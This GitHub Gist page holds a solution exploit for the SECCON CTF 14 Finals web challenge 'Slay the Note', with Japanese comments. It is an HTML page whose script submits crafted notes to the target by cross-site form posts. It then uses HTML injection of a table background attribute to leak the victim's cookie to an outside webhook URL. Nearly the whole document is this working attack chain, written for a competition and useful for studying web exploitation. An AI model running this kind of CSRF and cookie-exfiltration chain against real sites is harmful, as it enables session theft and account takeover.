Last active
February 28, 2026 13:30
-
-
Save st98/db466436c39661ab3012137a39ffcfc7 to your computer and use it in GitHub Desktop.
SECCON CTF 14 Finals - Slay the Note
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body> | |
| <script> | |
| (async () => { | |
| const target = 'http://web:3000'; | |
| const webhook = 'http://example.com/log.php'; | |
| const submit = note => { | |
| return new Promise(r => { | |
| const w = window.open('b.html'); | |
| w.onload = async () => { | |
| w.document.body.innerHTML = `<form method="POST" action="${target}/new"><input type="text" name="note"><input type="submit"></form>`; | |
| w.document.querySelector('input[name=note]').value = note; | |
| w.document.querySelector('form').submit(); | |
| setTimeout(() => { w.close(); r(); }, 250); | |
| }; | |
| }); | |
| }; | |
| const keshitai = '></table></article>'; | |
| await submit('zzzzzzzzzzzzzzz"'); // これが後ろの方にきてbackground属性を閉じる | |
| await submit('|' + '"'.repeat(keshitai.length)); // これが先頭にきて、Cookieの後ろに来る文字列(= keshitai)を消す | |
| await submit(`| z background="${webhook}?| <table></table>`); // 最終的に、<table>が先頭に来て、その次にbackgroundが来る | |
| for (let i = 0; i < keshitai.length; i++) { | |
| await new Promise(r => { | |
| const w = window.open(target + '/abc'); // これでkeshitaiの文字を消す | |
| setTimeout(() => { w.close(); r(); }, 100); | |
| }); | |
| } | |
| await submit('a'); // これでソートさせる | |
| window.open(target); // leak! | |
| })(); | |
| </script> | |
| </body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment